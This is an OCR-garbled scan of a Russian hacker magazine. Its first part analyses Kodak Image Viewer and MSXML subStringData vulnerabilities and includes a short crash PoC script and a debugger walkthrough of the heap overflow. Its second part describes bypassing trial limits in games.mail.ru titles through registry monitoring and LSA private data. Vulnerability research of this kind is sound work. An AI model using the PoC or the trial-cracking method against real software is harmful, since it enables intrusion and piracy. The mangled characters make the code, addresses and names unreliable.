проверяется, и потому он можетука- 
зывать на любую область памяти, в 
том числе и не относящуюся к файлу. 
Это может привести как минимум к 
краху приложения, а как максимум 
кпередачеуправления на збеіі-код 
со всеми вытекающими отсюда 
последствиями. 



КОйАК ІМА6Е 
ѴІЕѴѴЕР: 

V УДАЛЕННОЕ 
ИСПОЛНЕНИЕ КОДА 



>> Вгіеі 



| Сабжевый продукт 
входит в состав ѴѴ2К и переходит 
вХР при обновлении системы. В 
свою очередь, при обновлении ХР 
до Висты последняя получает в 
наследство Кобак Ітаде Ѵіеѵѵегсо 
всеми багами, которые там только 
есть, а отдуваться приходится 
МісгозоЮ Забавно, не правда ли? 
Ріо ближе к делу. 9 октября 2007 года 
хакер по имени Си Рапд обнаружил 
ошибку в парсереТІРР-файлов, 
для просмотра которых Кобак 
Ітаде Ѵіеѵѵег, собственно говоря, 
и предназначен. ЕІе вдаваясь в 
анатомические подробности строе- 
ния ТІРР-файлов, отметим, что в 
ТІРР-заголовке хранится смещение 
структуры Ітаде Рііе йігесіогу (или 
сокращенно ІРО], которая содержит 



>>Тагдеіз 



| ѴѴ2К; ѴѴ2К, обновлен- 
ная доХР; ѴѴ2К, обновленная доХР, 
обновленной до Висты. 



>> Ехріоіі 



| В дикой природе 
живых эксплойтов пока не встреча- 
лось, но их легко изготовить само- 
стоятельно из «честного» ТІРР-фай- 
ла, пропатчив его бех-редактором, 
как на рисунке. 



>> Зоіиііоп 



| Снести сабжевый 

продукт к едрени фени и использо- 
вать ИапѴіеѵѵ. 



мзхмь 

СОРЕ 

5ЕРѴІСЕ5: 



>> Вгіеі 



Місгозоб: очень сильно 
любитХМІ_. ЕІастолько сильно, что 
пихает его всюду, вот только ХМ І_- 




Ііпкз 

Обязательно 
посмотри ссылки по 
теме: 

ѵѵѵѵѵѵ.зупарзе. 

бе/Ьап/ЕІТМІ-/ 

Р І_АУЕР2/Епд/ 

Р 1ау279.Ы:т[ . 

ѵѵѵѵѵѵ.зесигіЫосиз. 

сот/Ьі сІ/23266/і пЕо. 

бИрзѴ/зІхікесепІег. 

Ьроіпізѵз.сот/ 

агІісІез/2007/1 0/1 0/ 

осіобег- 

2007 -тісгозоб:- 

Іиезбау, 

ѵѵѵѵѵѵ.зесигіМосиз. 

сот/Ыб/25301/ 

геіегепсез . 



движок (ХМ Ю Соге Зегѵісез, он же 
М5ХМІ_) до ума довести все никакие 
успевает, что ставит Висту в очень 
неприятное положение, подвер- 
гая ее угрозе переполнения кучи 
с потенциальной возможностью 
передачи управления на збеіі-код, 
захватывающий управление с 
привилегиями пользователя, запус- 
тившего ІЕ или СИЕісе. ЕНо не будем 
забегать вперед. 

14 августа 2007 года кодокопатель, 
пожелавший остаться анонимным, 
связался с компаниями ѴегіЗідп 



► 051 
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Юеіепсе ѴСР и 2его йау Іпібабѵе, сообщив им, что в методе зиЬзІтіпдОаЫ), 
реализованном вАсбѵеХ-компоненте МісгозоЮХМбООМ, отсутствует контроль 
входных параметров, что приводиткошибке целочисленного переполнения. 
Компании уведомили об этом Місгозой, которая в спешном порядке выпустила 
пару заплаток, но финальные версии Висты уже поступили в продажу и потому 
остались незалатанными, не говоря о новом Обісе и программных продуктах 
сторонних разработчиков, использующихХМВСогеЗегѵісез. Все это открывает 
огромный простор для атак, а потому остановимся на этой ошибке поподробнее 
и покажем, как ее можно использовать в хакерских целях, предварительно про- 
гнав уязвимый АсбѵеХ- модуль под отладчиком и дизассемблером. Собственно 
говоря, этот обширный раздел как раз и посвящен методам исследования 
уязвимого кода, но иметь секс с отладчиком мы будем чуть позже, а пока же изу- 
чим следующие ссылки на предмет получения дополнительной информации 
пб і/і и 1 1 і/і притр • веси гіМосиз. сот/а гсЬіѵе/1 /476602 и Ы:1:о5://5І:ибіо.1:еЦте. 
сопУбот/геіУтеіЛобз/зиЬзІгіпасІаіа.ЬіігпІ.. 



»Тагде(5 



I Дыра подтверждена в АсбѵеХ- компоненте МісгозоііХМВООМ, 
входящем в состав МісгозоііѴѴіпсІоѵѵзѴізІіа О/Визіпезз/Епіегргізе/Ноте 
Вазіс/Ноте Ргетіит/ІЛбтаІе/х64 Есіібоп, а также более ранних систем : ѴѴ2К, 
ХР, 8егѵег2003, е*с. Компонент МісгозоііХМВООМ используется ІЕ6.х/7.х, 
Місгозоіі: СЖісе 2003/8Р1/8Р2/2007 и программным обеспечением сторонних 
производителей, благодаря чемужертва можетбыть атакована через 1)РІ_, 
ѴѴогб/ЕхсеІ/РоѵѵегРоіпі: -документ и множеством других способов. 



»ЕхрІоі( 



] 1 6 августа в Сети появился исходный текст демонстрационного 
эксплойта, написанного хакером по имени АІІа ВеігоиісЬко из бельгийской 
компании Зсапк ( ѵѵѵѵѵѵ.зсапібЬе І. Боевой зИеІІ-код на его борту отсутствует, и 
результатом атаки становится аварийное завершение приложения: 



ДЕМОНСТРАЦИОННЫЙ ЭКСПЛОЙТ, АТАКУЮЩИЙ 
МІСК050РТ.ХМЮ0М 

<5СКІРТ> 



ѵаг хшІБос = пем АсЦіѵеХОЬзесС ( "Місгозобб . ХМЬБОМ" ) ; 




ѵаг оиб = СхС . зиЬзбгіпдБаба (1 , 0x766:1:6666) ; 
</5СКІРТ> 



>> 5оІи(іоп 



ІУстановить заплатки М807-042/М807-043 или же отказать- 
ся от использования ІЕ и ОЛісе. Однако залататься все же лучше, поскольку 
неизвестно, сколько существует программных продуктов сторонних разра- 
ботчиков, использующих МісгозоііХМВООМ, что весьма чревато. 



>> Риіі СІІ5СІ05Ѳ 



| В качестве подопытной лабораторной крысы будет 
выступать МісгозоЛѴѴіпсІоѵѵзЗегѵегЗООЗ ЕЫ6 в конфигурации поумол- 
чанию. Итак, помещаем НТМВ-код эксплойта в файл и открываем его с 
помощью ІЕ. Осел думает некоторое время и, когда наше терпение уже 
начинаетиссякать, внезапно исчезаете экрана, закрывая все свои окна, а 
при следующем перезапуске предлагает отослать рапорт в Місгозоіі Но мы 
же не стукачи какие-нибудь! Мы и сами разберемся, что к чему. Загружаем 
свой любимый ЗоШСЕ и повторяем открытие НТМВ-файла еще раз. ЗоШСЕ 
лихо отлавливаетехсербоп, спотыкаясь на инструкции РЕР2 МОѴЗѴѴ, 
расположенной по адресу 72Е5056Р6, очевидно, копирующей строку за 
пределы буфера и вызывающей исключение 5ТАТ6ІЗ_АССЕЗЗ_ѴІ06АТЮІ\І. 
Как мы сюда попали? И куда нам теперь идти? Сперва изучим исходный код 
эксплойта. Что мы видим? Методу зиЬзІтіпдОаЫ) в качестве количества 
извлекаемых из строки символов передается число 7РРРРРРР6, по всей 
видимости, и вызывающее переполнение, поскольку оно превышает объем 
динамической памяти, выделенной процессу! 



ШПттяН ЩЦі.ІіРРРѴѴі ПП. ЕРШИ Л ІЯІ.ГРГГРРРР 

іэі •«іеьшхі №>ииан ен ++іка+- іір>ччн')іі нсимі 
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Функции 72Е5О4Р0 (она же Зітіпд::пеѵѵ5і:гіпд] передается значение 
7РРРРРРР6 в качестве аргумента длиныД 



Сразу же по ходу дела возникает вопрос: куда Місгозоіі заныкала свою 
библиотеку МісгозоШХМЕООМ? Запускаем редактор реестра, нажимаем 
<СітІ-Р> (Ріпб) и вводим «МісгозоШХМЕООМ», после чего давим Ріпб и 
через несколько минутобнаруживаем ее в разделе ІпРгос8егѵег32 под 
именем %3узі:ет Рооі:%\Зузі:е т32\т5хт 13. б II. 

Хорошая идея — загрузить тзхтІЗ.сШ в дизассемблер, например в ЮА Рго, 
который тутже предложит нам скачать с сервера Місгозоіі файл с отладоч- 
ными символами, чтобы было удобнее дизассемблировать (многие симво- 
лы не экспортируются, и остается только гадать, что это за функция такая и 
на хрена она вообще). Короче, ЮА говорит нам: «Откройте Горящего Лиса 
или Оперу и вир литр ЬЛрѴ/тзсІІ.тісгозоЛ.сот/боѵѵпІоасі/зѵтЬоІз/тзхтІЗ. 
рбЬ/ЗЕ800В232/тзхт13.рс1 . Дождитесь завершения скачки, после чего 
распакуйте файл штатной утилитой ехрапб.ехе и положите его в один файл с 
дизассемблируемой 066, после чего нажмите ОК». 

Итак, мы получили тзхт(3.рсІ_, и что же мы будем с ним делать? А вот что! 
Возвращаемся в командную строку и говорим: 



$ехрапсі тзхшІЗ .рс6_ тзхтІЗ .рсІЪ 

Программа распаковки файлов Місгозобб (К) , версия 
5.00.2134.1 

(С) Корпорация МісгозобД , 1990-1999. Все права защищены. 
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Распаковка тзхшІЗ . рс!_ в тзхшІЗ .рсЗЬ. 

шзхтІЗ .рсЗ_: 791399 байт распаковано в 3138560 байт, 

увеличение на 296%. 



Сразу же после распаковки нажимаем ОК и видим, как ЮА Рго выводит 
перечень загружаемых символов. А выводит она их так долго, что воз- 
никаетсоблазн попить пива, чтобы не расслабляться. 

Короче, нашли мы приключения на своюзадницу! И кактеперь предпола- 
гается искать зибзІгіпдОаІа в дизассемблированном листинге? Обычно 
это делается по <5ЫИ-Е4> (І_із1: о( патез), но только не в этом случае, 
поскольку сейчас кроме метода нам еще необходимо указать класс, к кото- 
рому он принадлежит, а вот класса мы как раз и не знаем. «Рііе Ргобисе 
оиІриИіІе Ргобисе МАРРІе» — и воттеперь в сгенерированном тар- 
файле можно искать зиЬзІгіпдОаІіа тривиальным контекстным поиском 
через РАР или любой другой редактор по вкусу: 



П0ИСКФУНКЦИИ51ІВ5ТРІМ00АТА В МАР-ФАЙЛЕ 


0001:00066428 


1ос_7 2 ЕВ7 428 


0001:00066440 


ШСБОШгаррег : : зиЬзбгіпдБаба 




( Іопд ,1 опд , избюгб * *) 


0001: 0006646А 


1ос_7 2 ЕВ7 4 6 А 



Ага, правильное имя нашей подопечной оказывается ѴѴЗСйОМѴѴгаррег:: 
зиЬзІгіпдОаІа.такчто теперь можно смело жать <8ЫД- Р4> и писать его. 
Искомая функция обнаруживается по адресу 72ЕВ7440И. Запомним его, так 
какой нам впоследствии очень пригодится. 



ДИЗАССЕМБЛИРОВАННЫЙ ФРАГМЕНТ ФУНКЦИИ 


Ѵ/ЗСР0МѴѴКАРРЕВ::51ІВ5ТРІМС0АТА 


. бехб : 72ЕВ7440 ; риЫіс 


ѵігбиаі Іопд 


війсаіі ГОСРОМИгаррег 


: : зиЬзбгіпдБаба ( ) 


. бехб : 72ЕВ7440 ЗзиЬзбгіпдБаба @ШСБОШгаррег@@ 
ІІАСіЦМРАРАСІЗг ргос пеаг 


. бехб : 72ЕВ7440 


ризЪ ЗОЬ 


. бехб : 72ЕВ7442 


ризЬ оббзеб ипк_72Е4Е228 


. бехб : 72ЕВ7447 


саіі 5ЕН_рго1од 


. бехб : 72ЕВ744С 


саіі 




?д^бпЕпбгу@@ЗРбСРАБТЬ5@@Х2А 




; ТЬЗРАТА * (*д_р1пЕпі:гу) () 



Теперь неплохо было бы проанализировать функцию байтза байтом в поис- 
кахошибок, приводящих к переполнению. Учитывая размер функции, вре- 
мени на это уйдет порядочно. Ріо мы же хакеры, поэтому выбираем намного 
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| Отладчик послушно всплывает в момент вызова функции | 
|ѴУЗСР0МѴѴгаррег::5иЬ5ігіпдРа{аИ 



более быстрый путь. Устанавливаем точку останова на ѴѴЗСРОМѴѴгаррег:: 
зиЬзІгіпдРаІа и трассируем функцию под отладчиком, дожидаясь вылета 
исключения, после которого мы будемточно знать, где порылась собака или 
другое парнокопытное. 

Казалось бы, в чем проблема? Вводи ВРХ72ЕВ7440 — и можно курить даль- 
ше. Короче, запускаем ІЕ (без эксплойта!!!) и, пока он загружает домашнюю 
страницу, быстро жмем < Сігі- Р> , чтобы успеть очутиться в контексте ІЕ, а не 
псевдопроцесса Иіе (имя которого БоНІСЕ высвечиваете правом нижнем 
углу). Вообще-то, можно дать команду АВВВ ІЕХРІ_0РЕ, переключающую 
контекст вручную, но она не всегда срабатывает, какты этого ожидаешь, 
поэтому первый метод надежнее. Итак, будем считать, что мы находимся в 
контексте ІЕ. Даем командуй 72ЕВ7440, чтобы дизассемблировать функцию 
ѴѴЗСВ0МѴѴгаррег::5иЬ5І:гіпдВа1:а, и нас ожидает же сто кий облом, поскольку 
эта функция еще не загружена и соответствующий ей регион памяти не 
выделен, а потому вместо дизассемблерных инструкций отладчик пишет 
«ІЫѴАІ_Ю». 

Можно ли сейчас отдать команду ВРХ 72ЕВ7440 в надежде, что, когда функ- 
ция загрузится, точка останова сработает? А вот и нет! ВРХ подразумевает 
внедрение программной точки останова, которой соответствует машинная 
команда ОСЬ, а ее внедрять пока что не во что (память-то не выделена), да 
и все равно она будетзатерта при загрузке функции в память. На самом 
деле необходимо устанавливать аппаратную точку останова на испол- 
нение, что делается так: ВРМ 72ЕВ7440 X. После этого можно смело вы- 
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ходить из отладчика, загружать в ІЕ наш эксплойт, и отладчик послушно 
всплывет в момент вызова функции ѴѴЗСООМѴѴгаррепізиЬзІгіпдОаІа. 
Половину работы можно считать сделанной. Теперь, нажимая <Р10> (Біер 
Оѵег), трассируем функцию без захода в дочерние функции, дожидаясь 
возникновения исключения. Долго ждать не приходится, и при выполнении 
5ігіпд::5иЬ9Ігіпд(іпІ,іпі], расположенной по адресу 72ЕВ74РВИ, происходит 
крэш. 



ДИЗАССЕМБЛИРОВАННЫЙ ФРАГМЕНТ ФУНКЦИИ 
ѴѴЗС00МѴѴРАРРЕВ::51ІВ5ТРІМѲ0АТА 


. ЕехД : 72ЕВ74Р4 


саіі ?пемЗЕгіпд@ЗЕгіпд@@1@Ѵ? 


$_аггау@С@@@2 


; ЗЕгіпд: :пеѵ?ЗЕгіпд (_аггау<>) 


. ДехС:72ЕВ74Р9 


шоѵ есх, еах 


. ДехС : 72ЕВ74РВ 


саіі 

?зиЪзДгіпд@ЗЕгіпд@@0АЕРАѴ1@НН@2 
; ЗЕгіпд : : зиЪзДгіпд ( іпД , іпС ) 


. ДехС:72ЕВ7500 


шоѵ есх, еах 


. ДехС : 72ЕВ7502 


саіі ?деДВЗТК@ЗЕгіпд@@<2ВЕРАСХ2 
; ЗЕгіпд: : деЕВЗТК (ѵоісі) 


. ЕехД : 72ЕВ7507 шоѵ 


есх, [еЬр+141і] 



Выходим из отладчика, позволяя ему завершить процесс ІЕХРБОРЕ.ЕХЕ, 
и повторяем всю процедуру вновь, только на этот раз при достижении 
функции БіхіпдсзиЬзІхіпдПпЕіпі) нажимаем не <Р1 0>, а <Р8> (Біер іпіо) , 
чтобы войти внутрь нее и посмотреть, что интересного тут происходит: 



ДИЗАССЕМБЛИРОВАННЫЙ ФРАГМЕНТ 
ФУНКЦИИ 5ТРІМѲ::51ІВ5ТРІМ6ІІМТ,ІМТІ 


.ЬехЪ:72Е98157 


шоѵ еах , 


[ейі+ОСЬ] 


. СехС : 72Е9815А 


ризЪ езі 




. ДехС : 72Е9815В 


Іеа еах. 


[еах+еЪх*2 ] 


. ДехС : 72Е9815Е 


ризЪ. еах 




. ДехС : 72Е9815Р 


саіі ?пемЗЕгіпд@ЗЕгіпд@@1@@2 




; ЗЕгіпд: 


:пеѵ^ЗЕгіпд (изЪогД* , іпД ) 



А происходиттут, собственно, следующее. При достижении функции 
5ігіпд::пеѵѵ5{гіпд(и5ЬоН*,іп{), которой в качестве параметра іпі передается 
значение 7РРРРРРР6 в регистре Е5І, возникает исключение, что совсем 
неудивительно, поскольку создать строку такого огромного размера, прямо 
скажем, затруднительно. 

Что ж! Дизассемблируем саму функцию Бігіпд-пеѵѵБітіпд, где 
происходит финальное исключение. После нескольких незначащих 
проверок мы видим следующее. 



ДИЗАССЕМБЛИРОВАННЫЙ ФРАГМЕНТ ФУНКЦИИ 5ТКШ0:: 
ЫЕѴѴ5ТРШѲ 



. ЕехС : 72Е5Б550 


ризЬ 


еЬх 


. ЕехС : 72Е5Б551 


ризЬ 


езі 


. ЕехС : 72Е5Б552 


шоѵ 


еЬх, есх 


. ЕехС : 72Е5Б554 


саіі 


??0Вазе@@ІАЕ@Х2 






; Вазе :: Вазе (ѵоісі) 


. ЕехС : 72Е5Б559 


шоѵ 


езі, [езр+агд_0] 


. ЕехС : 72Е5Б55Б 


ЕезЕ 


езі, езі 


. ДехС : 72Е5Б55Р 


шоѵ 


дмогді рДг [еЬх] , 






(оіізеЕ 1ос_72Е85137+1) 


. ЕехС : 72Е5Б565 


92 


зЪогД 1ос_72Е5Б573 


. СехС : 72Е5Б567 


шоѵ 


есх, [езр+агд_4] 


. ЕехС : 72Е5Б56В 


ризЪ 


есіі 


. СехС : 72Е5Б56С 


шоѵ 


ейі , [еЪх+ОСЪ] 


. ЕехС : 72Е5Б56Р 


гер 


ШОѴЗѴ7 




; здесь возникает исключение 


. ЕехС : 72Е5Б572 


рор 


есіі 



Авоти машинная команда ВЕР М0Ѵ5ѴѴ. Именно она и вызываетисклю- 
чение! Бесконтрольное копирование памяти без какихбыто ни было 
проверок позволяет затирать служебные указатели строго дозированным 
образом, передавая управление на свой собственный збеІА-код по обыч- 
ной методике переполнения кучи, которая здесь не рассматривается. То, 
что это куча, а не стек, видно из того, что память выделяется оператором 
пеѵѵ (на приведенных выше фрагментах он отсутствует). С другой стороны, 
выделенные адреса (куда осуществляется копирование строки) относятся 
к динамической памяти, что легко узнать, посмотрев на карту. 

Подводя итоги, мы не без гордости можем сказать, что не только научились 
отлаживать АсбѵеХ-компоненты, не только познакомились с файлами 
отладочных символов, но еще и освоили общие принципы исследова- 
ния программ без исходных текстов. Кстати, если добавить в функцию 
зиЬзІхіпдОаЫ) дополнительную проверку (стартовая позиция плюс 
количество извлекаемыхсимволов должно быть меньше или равно длине 
строки), что осуществляется прямо в Ьіеѵѵ’е (место для нескольких машин- 
ных команд найти нетрудно), то можно отказаться отзаплатки МБ. Хотя при 
этом с цифровой подписью придется распрощаться, и АсбѵеХ-компонент 
потребуется подписывать заново, используя свою собственную подпись. 

А она денег стоит! Как вариант — можно править функцию прямо в памяти, 
но для этого придется отслеживать ее загрузку, что уводит нас в дремучие 
дебри опііпе раІсЬ’а, о котором мы поговорим в другой раз. ЗЕ 
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ШАМПУНЬ НІѴЕА РКЕ5Н КІСК — 

СВЕЖЕСТЬ НА ВСЮ ГОЛОВУ! 



НОВЫЙ ШАМПУНЬ РКЕ5Н КІСК ОТ ШѴЕА! 



Экстракты гуараны и лайма заряжают 
твои волосы свежестью на целый день! 










^ ПОСТАНОВКА ЗАДАЧИ 

Мы будем потрошить симпатичную гейму Аде оПарап от компании І_оІ_о 
Оатез. Остальные игры ломаются аналогичным образом, поскольку 
построены на том же самом движке. Может быть, не все игры, но подав- 
ляющее большинство точно. Я проверял «Тайны Египта» [ Ьир://пеѵ050ІТ. 
ги/боѵѵп[оабаЫе-дате/Ьгіск5Ьоо1ег-едурЕІ")1т 1. «Пузырьковое ассорти» 
[ ЬирѴ/даппез.таіІ.ги/зЬагеѵѵаге/дате/ригугкоѵое аззогіі і и еще не- 
сколько других игр, взятых наугад с сайта аатез. таіі.ги . 

После Аде о^арап игры вскрываются на автомате, без всякихумствен- 
ныхусилий, причем стратегия взлома такова, что разработчикам навряд 

► 056 



ли удастся исправить защиту после выхода этой статьи. Даже если они 
перепишут ее с чистого листа, это все равно ничего не изменит. Я поста- 
вил перед собой задачу не просто хакнуть конкретно взятую игрушку, а 
найти универсальный способ взлома, подходящий не только для аатез. 
таіі.ги . но и для многих другихтриальных приложений, написанных 
сторонними разработчиками. И, представь себе, решил! 

Ксожалению, по непонятным причинам Аде оПарап исчезла с датез. 
таіі.ги . Болеетого, она исчезла и с официального сайта ее непосред- 
ственных разработчиков. Тем не менее она уже успела расползтись по 
интернету, но, чтобы не давать ссылки на потенциально ненадежные 
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Проект §атез. таіі.ги крышует многие условно-бесплатные игры, работающие всего 1 
час, а затем требующие денег (или расплаты натурой). Народ разрываясь бьется в исте- 
рике: платить за софту нас не принято и унизительно, а играть-то хочется! Причем се- 
рийные номера меняются чуть ли не каждый день, и кряки, найденные в Сети, не сраба- 
тывают. Между тем существует простой, элегантный и универсальный способ взлома, 
доступный даже продвинутым пользователям, не разбирающимся ни в дизассемблере, 
ни в секретах хакерства! 







взлом 



Просмотр текстовых строк в файле зЬоѵѵсазе.ехе, распакованном упаков- 
щиком 1)РХ, запущенным с ключом ’-сГ 



Дизассемблирование защитного механизма в ЮА Рго 

ресурсы, мы решили выложить установочный файл на 0\Ю, а также на 
ЬіІрѴ/пегиті.ога.ги/зоигіг/ЬаскзеІирааеоііарап.ехе [естественно, в 
оригинальном, неломанном варианте]. 

Кстати говоря, сам взлом не противоречитУК, так как не модифицирует 
ни одного байта, непосредственно относящегося к игре, поскольку хачить 
программы это, во-первых, нехорошо, а во-вторых, не универсально. 

^ ПЕРВЫЕ ЭКСПЕРИМЕНТЫ, ИЛИ АРТОБСТРЕЛ ПЕРЕД БОЕМ 

Запускаем зеіирадео^арап.ехе и устанавливаем игру на свой компьютер 
(разумеется, это может быть не только «Век Японии», но и любая другая 
игра, ведь принцип взлома универсален вплоть до мельчайших деталей). 
Установка проходитуспешно, и на рабочем столе появляется красивый 
красный веер, по которому требуется щелкнуть мышью. Дважды. 

Сразу же после запуска на экран выпрыгивает противное диалоговое 
окно с неизменным логотипом «игрыйтаіі.ги» и сообщением отом, что 
у нас осталось 60 минут. Внизу находятся кнопки: «Играть», «Купить», 
«Еще игры» и «Ввести ключ». 

Нажимаем «Играть» и гоняем мышь по всему экрану пока не надоест, 
после чего выходим по <Езс> и видим, что количество игрового времени 
сократилось до 47 минут. Но мы ведь даже не начали играть! 

Предаемся экспериментам: нажимаем «Ввести ключ» и вводим ка- 
кое-нибудь число от балды, например 1 23456, наблюдая за реакцией 
программы, которая после секундной задержки, сообщает нам, что мы 
ошиблись и ввели неверный номер регистрационного ключа. Активность 
персонального брандмауэра при этом нулевая, то есть защита не ломится 
в сеть и проверка осуществляется локально, что существенно облегчает 
взлом. Достаточно дизассемблировать программу, выдрать из нее прове- 
рочный код и написать свой собственный генератор серийных номеров. 
Воттолько никаких гарантий, что в остальных программах используется 
тотже самый алгоритм, у нас нет! 

Нам нужно найти универсальный способ, подходящий для всех игр сразу 
(втом числе итех, которые еще не вышли) и желательно не противореча- 
щий закону, поскольку за распространение кряков, генераторов и серий- 
ных номеров легко схлопотать по мозгам. Что поделаешь, программисты 
не любят, когда ломают их программы. 

^ НА ПОДСТУПАХ К ВЗЛОМУ 

Игре соответствует исполняемый файл зЬоѵѵсазе.ехе. Загружаем его 
в любой Ьех- редактор (например, Ьіеѵѵ или РАЕ) и смотрим в начало 
файла, где следом за магическом словом РЕ следуют секции с именами 



1ЭРХ0 и ІІРХ1 , выдающие имя упаковщика. Скачиваем ІІРХ посвежее 
с ирх.зоигсеіогде.пеі: (благо он бесплатен) и распаковываем файл с 
помощью самого упаковщика, запущенного с ключом '-6' (сокращение 
от бесотргезз). 

После этого игра увеличивается в размере с 500 Кб до 3,7 Мб, и все тек- 
стовые строки, выводимые защитой на экран, становятся зрительно ви- 
димыми; в частности, нажав <АІ_Т-Р7>, мы можем найти: «У Вас осталось 
<...> минут игры», «Поздравляем Вас! Игра успешно зарегистрирована!», 
«Ошибка — неверный регистрационный ключ». 

Действуем по стандартной и годами отработанной схеме. Грузим распа- 
кованный файл в ЮА Рго (если она есть), находим указанныетекстовые 
строки, по перекрестным ссылкам, сгенерированным Идой, поднимается 
«наверх», ктому коду, который их выводит, и анализируем его окрест- 
ности на предмет поиска условного перехода, определяющего правиль- 
ность регистрации. С одной стороны к нему примыкает код валидации 
серийных номеров, с другой — счетчик игровых тиков, обновляемый 
инструкцией МОѴ. Очевидно, если заменить МОѴ (копирование данных) 
командой ЫОР (нетоперации).то игровое время навсегда застынетна 
отметке в 60 секунд. 

Однако предложенный способ страдает рядом недостатков. Прежде все- 
го, он неуниверсален, и с каждой игрой приходится разбираться индиви- 
дуально, что не есть хорошо, особенно если хочется играть во все игры и 
сразу! Также неподготовленным пользователям очень сложно объяснить, 
какие именно действия они должны предпринять для достижения желае- 
мого результата. Вид дизассемблера большинство начинающих хакеров 
приводит в ужас, и они предпочитают пользоваться готовыми кряками, а 
не писать кряки для всех игр. 

В принципе возможно расшифровать алгоритм генерации серийных 
номеров, который должен быть общим для всех игр, но никаких гарантий 
туту нас нет, тем более что изменить алгоритм (имея исходные тексты 
игры на руках) — минутное дело, и хакерские генераторы тут же откажут в 
работе, а постоянно дорабатывать их ни у кого желания нет. 

И НАЧИНАЕМ ЛОМАТЬ 

Очевидно, чтобы знать, сколько осталось времени, защита должна где-то 
в той или иной форме хранить это значение. Начнем с простого. Копируем 
игру в другой каталог, запускаем, играем. Возвращаемся к оригиналу. 

И что же мы видим! Оригинал прекрасно осведомлен, сколько времени 
мы играли! Следовательно, игровое время внутри каталога Аде оЮарап 
не хранится, и его нужно искать совершенно в другом месте (что, кстати 
сказать, вполне логично, иначе бы игру уже давно сломали). 

Для сужения района поиска проведем следующий эксперимент: запус- 
тим штатную утилиту М5 Васкир (вызываемую из командной строки по 
пібаскир.ехе] и сохраним образ операционной системы в Ьк^-файл, затем 
поиграем (хоть до полного истечения игрового времени), после чего 
выполним процедуру восстановления из ЬМ-файла. 

Ну и что? Время «волшебным» образом возвращается назад! Эту опера- 
цию можно проделывать сколько угодно раз (пока не надоест), она вполне 
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легальна, но архивация и восстановление выполняются достаточно 
медленно и ктому же требуют прав администратора и перезагрузки. 
Кроме того, образ системы должен быть создан до окончания триала, а не 
после него. 

Хорошо, предположим, что данные о времени хранятся в реестре (дейст- 
вительно, прятать их в файлах было бы неразумно и слишком заметно). 
Берем бесплатный РедІБІгу Мопііюгот Марка Руссиновича и смотрим, к 
каким ветвям реестра обращается программа. 

Таких ветвей на самом деле очень много, но при тщательном разборе 
лога обращают на себя внимание два ключа, названия которых гово- 
рят сами за себя: НКСУ\5оі1\л/аге\ІТТ0ате5\58\РетаіпТіте и НКС1)\ 
5об:\л/аге\ІТТ0агпе5\58\ТоІаПГігпе, то есть сколько времени осталось и 
сколько его всего соответственно. 

Попробуем их изменить? От предвкушения близкой победы у нас пересы- 

Просмотр свойств ярлыка — программе передается идентификатор 97 в 
командной строке 




хает во рту и мы едва попадаем по клавишам. Однако все наши действия 
дают нулевой эффект, воздействующий только на «градусник» (линейку 
прогресса), но игра все равно завершается в положенный срок, несмотря 
на захаченный реестр. 

Собственно, этого и следовало ожидать. М5 Васкир не сохраняет 
НКЕУ_С0РПЕМТ_1)5ЕП, следовательно, значения, содержащиеся в этой 
ветви, используются защитой исключительно в качестве вспомогательных 
данных (например, для быстрой отрисовки «градусника» без актуального 
запуска защитного механизма). Впрочем, такой трюк ничуть неусложняет 
взлом (по крайней мере, для тех, кто помимо монитора реестра владеет 
техникой отладки и знаетассемблер как свой хвост родной). 

Но, прежде чем бросаться в объятия дизассемблера, нелишне запустить 
АРІ-шпион, чтобы узнать, с какими системными функциями работает 
защита и в каком направлении нам вообще копать. АРІ-ш пионов много. 
Лично я предпочитаю бесплатный КегЬегоз от Рустема Фасихова ( ѵѵѵѵѵѵ. 
ѵѵа5т.ги/ЬаіхасІо.рЬр?тос1е=1:оо[&ісІ=313 ). 

Однако, если просто скормить ему имя исполняемого файла (в данном 
случае збоѵѵсазе.ехе), ничего хорошего не получится и программа завер- 
шится, не успев еще начаться, с сообщением о неправильной установке. 
Создается такое впечатление, что она содержит мощные антиотладочные 
приемы, сопротивляющиеся шпионажу, но на самом деле все гораздо 
проще! 

В командной строке игра ожидает получения определенного параметра, 
равного (в случае Аде о{ Зарап) числу 97, что легко выяснить, щелкнув 
правой клавишей мыши по ярлыку с веером и как следует изучив его свой- 
ства. От глаз опытного хакера ничто не скроется! 

Запускаем КегЬегоз еще раз, явным образом прописав аргумент97 в 
параметрах командой строки (разумеется, втвоем случае это значение 
можетбыть другим), жмем на Іщес* и даем ему поработать до появления 
основного игрового поля на экране. После этого выходим из программы и 
приступаем к анализу отчета, сохраненного в файле зЬоѵѵсазе.гер и содер- 
жащего сотни тысяч строк, преимущественно состоящих из повторяющих- 
ся функций, так что пара банокпива нам не помешает. 

Подавляющее большинство АРІ-функций совершенно обычны по своей 
природе и сохранятьзначение в реестре (или за его пределами) не могут. 
Однако наше внимание привлекает серия функций с префиксом БЗА (Босаі 
Зесигііу АиіЬогіІу), использующихся для хранения секретных криптогра- 
фических ключей (и другой конфиденциальной информации) в Защищен- 
ном хранилище, доступа к которому не имеет даже администратор! 
Так-так-так! Уже тепло, если не сказать жарко! Пахнет чем-то паленым, на- 
верное, защита горит, точнее, догорает. Еще немного — и мы ее взломаем! 

В БИТВА ЗА І_5А 

По замыслу разработчиков ЫТ, доступ к секретной информации должна 
получать только та программа, которая ее туда положила. Между тем 
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Да, а меня проперло, 
что все 100% законно. В 
самих-то играх ведь не 
изменено ни байта! 



Работа с І_5А-слотами в редакторе реестра 



Мобильнгые игры считаю 
отстоем, но статья понра- 
вилась. Очень изящное 
исследование и красивые 
приемы. 




функции БзаНеІгіеѵеРгіѵаІеОаІа/І-заБіогеРгіѵаіеОаіа, 
дающие доступ ко всем секретным данным, существуют еще 
со времен ЫТ 4.0, хоть и остаются недокументированными 
(типа для внутренних нужд системы). Однако сейчас о них 
знает каждый (или практически каждый) хакер. Физически 
они сосредоточены в файле \\Л/1ММТ\5уз{ет32\сопбд\5АМ, 
монтируемом на ветвь системного реестра НКІ_М\5ЕСІ)РІТѴ\ 
РоІісу\5есгеіз, доступ к которому имееттолько Бузіет, но, 
увы, не администратор! 

Тем не менее мы можем написать несложную утилиту, 
читающую и записывающую секретные данные с помощью 
АРІ -функций ЕзаВеІхіеѵеРгіѵаіеОаіа/ЕзаБіогеРгіѵаІеОаІа, 
что позволит нам получить неограниченный триал. Вся 
проблема втом, что мы не знаем, в какой именно слот игра 
записываетсвои данные. Болеетого, прежде чем править 
эти данные (а они зашифрованы), в них как минимум следует 
разобраться, анализируя мегабайты дизассемблерного 
